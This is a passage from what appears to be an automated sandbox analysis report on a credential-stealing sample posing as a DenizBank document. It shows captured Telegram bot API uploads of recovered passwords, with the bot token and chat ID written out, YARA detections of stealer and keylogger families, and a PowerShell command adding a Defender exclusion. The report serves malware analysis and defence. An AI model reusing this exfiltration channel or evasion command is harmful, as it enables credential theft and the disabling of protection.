2024-11-25 10:44:05 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:05 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:05 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":98,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531445,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49923	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:44:07 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1c192e1ef1f1 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:44:07 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 63 31 39 32 65 31 65 66 31 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd1c192e1ef1f1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:44:07 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:07 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:07 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a Data Ascii: {"ok":true,"result":{"message_id":99,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531447,"document":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49928	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:44:09 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1e7018cadc20 Host: api.telegram.org Content-Length: 580
2024-11-25 10:44:09 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 65 37 30 31 38 63 61 64 63 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd1e7018cadc20Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:44:09 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:09 GMT Content-Type: application/json Content-Length: 525 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:09 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":100,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531449,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49934	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:44:11 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd21292cee4675 Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:44:11 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 31 32 39 32 63 65 65 34 36 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd21292cee4675Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:44:12 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:12 GMT Content-Type: application/json Content-Length: 525 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:12 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 35 32 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":101,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531452,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49940	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:44:14 UTC	345	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd86961858f128 Host: api.telegram.org Content-Length: 580
2024-11-25 10:44:14 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 38 36 39 36 31 38 35 38 66 31 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8dd86961858f128Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:44:14 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:14 GMT Content-Type: application/json Content-Length: 525 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:14 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":102,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531454,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49946	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:44:16 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8ddcce5e6fa50ba Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:44:16 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 63 63 65 35 65 36 66 61 35 30 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8ddcce5e6fa50baContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:44:16 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:44:16 GMT Content-Type: application/json Content-Length: 526 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:44:16 UTC	526	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 34 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":103,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531456,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50129	149.154.167.220	443	7656	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:46:15 UTC	369	OUT	POST /bot7763512808:AAF6jV3Q9vl-Dge89AACabTutj739SesQH0/sendDocument?chat_id=-4551023826&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8ff950ef5a466fb Host: api.telegram.org Content-Length: 580 Connection: Keep-Alive
2024-11-25 10:46:15 UTC	580	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 66 66 39 35 30 65 66 35 61 34 36 36 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 35 2f 31 31 2f 32 30 32 34 20 2f 20 30 35 3a 34 32 3a 30 39 0d Data Ascii: --------------------------8ff950ef5a466fbContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:585948Date and Time: 25/11/2024 / 05:42:09
2024-11-25 10:46:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 25 Nov 2024 10:46:15 GMT Content-Type: application/json Content-Length: 525 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 10:46:15 UTC	525	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 33 35 31 32 38 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 45 6d 62 65 72 56 49 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 65 6d 62 65 72 76 69 70 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 35 31 30 32 33 38 32 36 2c 22 74 69 74 6c 65 22 3a 22 45 4d 42 45 52 20 53 4e 41 4b 45 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 35 33 31 35 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":105,"from":{"id":7763512808,"is_bot":true,"first_name":"EmberVIP","username":"embervipbot"},"chat":{"id":-4551023826,"title":"EMBER SNAKE","type":"group","all_members_are_administrators":true},"date":1732531575,"document"

Target ID:	0
Start time:	05:42:06
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Imagebase:	0x3e0000
File size:	754'688 bytes
MD5 hash:	99334C137B21036493A00305CD3189DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1801804713.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1799552276.0000000003801000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:42:09
Start date:	25/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Imagebase:	0x530000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:42:09
Start date:	25/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:42:09
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Imagebase:	0x100000
File size:	754'688 bytes
MD5 hash:	99334C137B21036493A00305CD3189DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:42:09
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe"
Imagebase:	0x9a0000
File size:	754'688 bytes
MD5 hash:	99334C137B21036493A00305CD3189DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
